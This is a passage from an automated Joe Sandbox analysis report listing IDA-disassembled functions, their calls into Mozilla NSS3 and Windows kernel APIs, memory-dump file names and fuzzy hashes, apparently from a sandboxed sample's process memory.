Part of subcall function 6C76CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF67
Part of subcall function 6C76CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C76CD93,?,?,?,?,?,?,?,?,?,?,?,6C76CD93,?), ref: 6C76CF78

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 6704c265e32e1de513f2f9e6e9e3993e834d7e9a6dd1ee0ecc1d4a1c4db11803
Instruction ID: db9edd704738a24de1a59480f6ecbafafb22c73816634de4a93cf58a8f18d85c
Opcode Fuzzy Hash: 6704c265e32e1de513f2f9e6e9e3993e834d7e9a6dd1ee0ecc1d4a1c4db11803
Instruction Fuzzy Hash: 5851B1B6A001019FEB10EF6ADE48BAA77F8AF48349F250534DC55A7F40EB31E904CB91

Function 6C73EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C73EF38

Part of subcall function 6C729520: PK11_IsLoggedIn.NSS3(00000000,?,6C75379E,?,00000001,?), ref: 6C729542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C73EF53

Part of subcall function 6C744C20: TlsGetValue.KERNEL32 ref: 6C744C4C
Part of subcall function 6C744C20: EnterCriticalSection.KERNEL32(?), ref: 6C744C60
Part of subcall function 6C744C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744CA1
Part of subcall function 6C744C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C744CBE
Part of subcall function 6C744C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C744CD2
Part of subcall function 6C744C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C744D3A

PR_GetCurrentThread.NSS3 ref: 6C73EF9E

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

free.MOZGLUE(00000000), ref: 6C73EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C73F016
free.MOZGLUE(00000000), ref: 6C73F022

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 91a974605becda432f6b302d22d18925f4ce8a8d237c4db308efd1578e780d39
Instruction ID: 56dd5f85644cd1cc918f8c43192be6192f726761163e3ab74f3a8e8fb56c1c17
Opcode Fuzzy Hash: 91a974605becda432f6b302d22d18925f4ce8a8d237c4db308efd1578e780d39
Instruction Fuzzy Hash: E74193B1E0010AAFDF018FA9DD49BEE7BB9AF48358F044035F918A6351E776C915CBA1

Function 6C714860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C714894

Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7148CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7148DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C7148FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C714912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C71494A

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 8e171f5b87f1438cc7f6470ee6e32e3e54a2bebb30e857154ab1e6c490eec879
Instruction ID: bcbbebb40e3d3a501e42ec09ba8b9ce357aceeaf4c921eac7c5ce3e201dee282
Opcode Fuzzy Hash: 8e171f5b87f1438cc7f6470ee6e32e3e54a2bebb30e857154ab1e6c490eec879
Instruction Fuzzy Hash: 8D41B271608305ABEB00CB69DA88BAB77E89F4461CF58053CFA5597B41FB70E908DB52

Function 6C72CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C72CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C72D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C72D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C72D025
PR_NewLock.NSS3 ref: 6C72D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C72D074

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 57f104fc96329518c8dc2f3a51d985c27a109ea654575d414b6ec998a84dd605
Instruction ID: 30ed776f6226bcfecebbfe78b4ec263588843d553c8233d72b0f3fe0e3e559cd
Opcode Fuzzy Hash: 57f104fc96329518c8dc2f3a51d985c27a109ea654575d414b6ec998a84dd605
Instruction Fuzzy Hash: 5641E5B1A013018FEB60DF29CA8879ABBE4EF18319F108179DC198F756D778D485CB95

Function 6C768810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C7686AA), ref: 6C768851

Part of subcall function 6C761340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76136A
Part of subcall function 6C761340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76137E
Part of subcall function 6C761340: PL_ArenaGrow.NSS3(?,6C6FF599,?,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?), ref: 6C7613CF
Part of subcall function 6C761340: PR_Unlock.NSS3(?,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6C7686AA), ref: 6C76886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6C768890
PR_GetCurrentThread.NSS3 ref: 6C76891C
PR_GetCurrentThread.NSS3 ref: 6C768937

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: 9cf58d4b95a0279fc4eb14d4c3cd90547a8bec30fd120ebbf984ab8729ca027f
Instruction ID: bef9b664472357f377ef5dfd435282c3406e8638d6b374644f0c752ccae5b328
Opcode Fuzzy Hash: 9cf58d4b95a0279fc4eb14d4c3cd90547a8bec30fd120ebbf984ab8729ca027f
Instruction Fuzzy Hash: AA4198B06017029FF744CF2ACA94B51BBA4FF55308F14427ADC189BB51EB72E9A4CB91

Function 6C790960 Relevance: 9.1, APIs: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C862F88,Function_00110660,-00000001,?,?), ref: 6C790983

Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9

TlsGetValue.KERNEL32(-00000001,?,?), ref: 6C790997
EnterCriticalSection.KERNEL32(?), ref: 6C7909AB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C790A30
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C790A60
PR_Unlock.NSS3 ref: 6C790A85

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuestrcmp$CallOnce
String ID:
API String ID: 3855614339-0
Opcode ID: b50ff82e80c5a1be65f768cb9dbca37fb096aae9deaf7d4e671c2e5c87013d57
Instruction ID: 5680783ab52ad5643b1dfe2a71f8c13bc89c71ad392695d20e37361fab7fb3de
Opcode Fuzzy Hash: b50ff82e80c5a1be65f768cb9dbca37fb096aae9deaf7d4e671c2e5c87013d57
Instruction Fuzzy Hash: E3411B34A107829BEB218F19E944B56B7B5FF09318F144A3AEC9897F41D734E954CBD0

Function 6C778890 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000004,?), ref: 6C7788C0
PK11_HashBuf.NSS3(00000003,?,?,?), ref: 6C7788E0
NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C778915
HASH_ResultLenByOidTag.NSS3(00000000), ref: 6C778928
PK11_HashBuf.NSS3(00000000,?,?,?), ref: 6C778957
PK11_HashBuf.NSS3(00000004,?,?,?), ref: 6C778980

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: HashK11_$AlgorithmPolicy$Result
String ID:
API String ID: 2238172455-0
Opcode ID: e5726480849ae4d76788c962be6ea7e4fd5c90dea95115a8e7ea47ff290abf25
Instruction ID: 5018b47683dc509eaa8d102d73eca204de198e06d7859774ed3a4be8ae4f2e84
Opcode Fuzzy Hash: e5726480849ae4d76788c962be6ea7e4fd5c90dea95115a8e7ea47ff290abf25
Instruction Fuzzy Hash: 5831D67290411DABEF108AA5DE48BAB7A58AF05318F540132EE18B7A81E7359A14C7F7

Function 6C712E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C702D1A), ref: 6C712E7E

Part of subcall function 6C7607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C708298,?,?,?,6C6FFCE5,?), ref: 6C7607BF
Part of subcall function 6C7607B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7607E6
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C76081B
Part of subcall function 6C7607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C760825

PR_Now.NSS3 ref: 6C712EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C712EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C702D1A), ref: 6C712F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C702D1A), ref: 6C712F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C712F81

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 685fad8adbe857dfc608c1afa0aed88f9aa82085be9fecf74766d5605e54c072
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 9B3134715091408BF710C665CE4CFAFB2ADEF82318F6C0A79D42997ED1EB31998AC711

Function 6C700E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C700A2C), ref: 6C700E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C700A2C), ref: 6C700E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C700A2C), ref: 6C700E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C700A2C), ref: 6C700E90
free.MOZGLUE(00000000), ref: 6C700EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C700A2C), ref: 6C700ED9

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 5341808848a733ce47be796cc097a74d0473c10af030d3c557c43360562ba5c8
Instruction ID: bd49764ca9f29c7f01c053554f8e40ad384c042d6c9384feb17aab0f8d47fc5e
Opcode Fuzzy Hash: 5341808848a733ce47be796cc097a74d0473c10af030d3c557c43360562ba5c8
Instruction Fuzzy Hash: 17213EF2F0028457EB106D769E49B6B76EEDBC1769F190035DC18B3A02EBB0C81483A2

Function 6C6EA9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6C7C9270), ref: 6C6EA9BF
PR_IntervalToMilliseconds.NSS3(?,?,6C7C9270), ref: 6C6EA9DE

Part of subcall function 6C6EAB40: __aulldiv.LIBCMT ref: 6C6EAB66

Part of subcall function 6C7CCA40: LeaveCriticalSection.KERNEL32(?), ref: 6C7CCAAB

LeaveCriticalSection.KERNEL32(?), ref: 6C6EAA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6C6EAA39
EnterCriticalSection.KERNEL32(?), ref: 6C6EAA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C6EAAEB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: 89158ca63777a1121c69d8d06cb5d3a84dbbf57cfc79bca51f16b88090220ec8
Instruction ID: 30be79e6337dfd7db68ec87bdbf2dc36f41230252a6973c2ec2aeb233dc113d3
Opcode Fuzzy Hash: 89158ca63777a1121c69d8d06cb5d3a84dbbf57cfc79bca51f16b88090220ec8
Instruction Fuzzy Hash: BF418F706097118FD7109F29C5887D6BFF1FB0A328F24866EE45D8B642DB76D882CB84

Function 6C7188D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C720725,00000000,00000058), ref: 6C718906
EnterCriticalSection.KERNEL32(?), ref: 6C71891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C71894A
calloc.MOZGLUE(00000001,6C72072D,00000000,00000000,00000000,?,6C720725,00000000,00000058), ref: 6C718959
memset.VCRUNTIME140(?,00000000,?), ref: 6C718993
PR_Unlock.NSS3(?), ref: 6C7189AF

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 2b4939a7221f846d6a395a977e1f14aec4528a403067cb30754e3cfef03e09be
Instruction ID: 43ebdc5dc91a57a5528e42d79aeae008d9a6def7d0c3eb315324607c55852435
Opcode Fuzzy Hash: 2b4939a7221f846d6a395a977e1f14aec4528a403067cb30754e3cfef03e09be
Instruction Fuzzy Hash: 7931F372E04115ABD7008F29CD45A59BBA8AF0531CF1E8636EC189BF42E731E945CBD2

Function 6C70AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C70AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C70AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C70AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C70AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C829500), ref: 6C70AF23

Part of subcall function 6C75F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C75F0C8
Part of subcall function 6C75F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C75F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C70AF37

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 765e1b80ab1e619169cddcaba6e6f95034f0ae8f2a180ee9a69a7f2464652634
Instruction ID: 45bc6ec29e98b54c1592418af65f074dc87b229dbe17fe395c27837308bece09
Opcode Fuzzy Hash: 765e1b80ab1e619169cddcaba6e6f95034f0ae8f2a180ee9a69a7f2464652634
Instruction Fuzzy Hash: 3C214CF2A05200ABEB108E188E05B9A77E4AF8573CF144324FC149B7D0E731E54587A7

Function 6C78EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C78EE85
realloc.MOZGLUE(BAEEE052,?), ref: 6C78EEAE
PORT_Alloc_Util.NSS3(?), ref: 6C78EEC5

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

htonl.WSOCK32(?), ref: 6C78EEE3
htonl.WSOCK32(00000000,?), ref: 6C78EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C78EF01

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 827c06f6142bb5753058e62d40e86bcfbbbc20eda6c82d5bd49c76047c76d307
Instruction ID: 0b4fa4d27b3dd2eacb37e896da3fa0fd9fdfca7d5634e2fe29a102ccb75ae591
Opcode Fuzzy Hash: 827c06f6142bb5753058e62d40e86bcfbbbc20eda6c82d5bd49c76047c76d307
